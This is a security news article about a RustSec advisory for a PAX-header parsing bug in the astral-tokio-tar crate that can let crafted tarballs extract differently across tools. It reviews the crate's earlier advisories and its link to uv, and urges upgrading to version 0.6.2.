RustSec flags astral-tokio-tar archive bug, file smuggling risk

One tarball can still fool different tools in different ways, and that is exactly the problem RustSec flagged in astral-tokio-tar. The new advisory, RUSTSEC-2026-0145, said versions before 0.6.2 can mis-handle PAX headers when multiple tar headers appear before a file entry, creating a parser differential that can make the same archive extract differently depending on which tar implementation reads it.

RustSec reported the bug on May 18 and issued the advisory on May 19, mapping it to GHSA-3cv2-h65g-fgmm and rating it Moderate. GitHub’s advisory says the only fix is to upgrade, and that users should not expect breaking changes from 0.6.2. The bug matters because it is not just a correctness glitch inside one crate. A malicious archive can pass one check, then unpack another way later, which is exactly how files get smuggled past review, scanning, or policy enforcement.

The failure mode is specific. When a tar stream contains a PAX extension, then a GNU longname header, then a file entry, astral-tokio-tar incorrectly applies the PAX header to the next entry regardless of type. That desynchronization means the file can be interpreted one way by astral-tokio-tar and another way by a different tar parser. In a build pipeline, package installer, or deployment job, that kind of mismatch can turn archive inspection into a false sense of safety.

This is not the first time astral-tokio-tar has tripped over tar edge cases. RustSec’s package history shows earlier advisories on October 25, 2025 and March 23, 2026. A March 16, 2026 advisory, GHSA-6gx3-4362-rf54, fixed silent skipping of malformed PAX extensions in 0.5.6 and earlier. RustSec also tied the 2025 tar desynchronization issue to CVE-2025-62518. The pattern is hard to ignore: the crate keeps running into the same risky seam between archive metadata and parser behavior.

GitHub said uv is astral-tokio-tar’s primary downstream user, which makes the issue especially relevant to the Python packaging path that many Rust developers touch indirectly through tooling and automation. uv 0.9.5 already upgraded astral-tokio-tar to handle malformed archives with mismatching size information between ustar headers and PAX extensions, showing how quickly archive bugs can ripple into real release engineering work.

The practical takeaway is blunt: if your Rust code extracts untrusted archives, you are in the threat model now. Upgrade astral-tokio-tar to 0.6.2, retest every archive-handling path, and assume that one crafted tarball can look harmless to one tool and dangerous to another.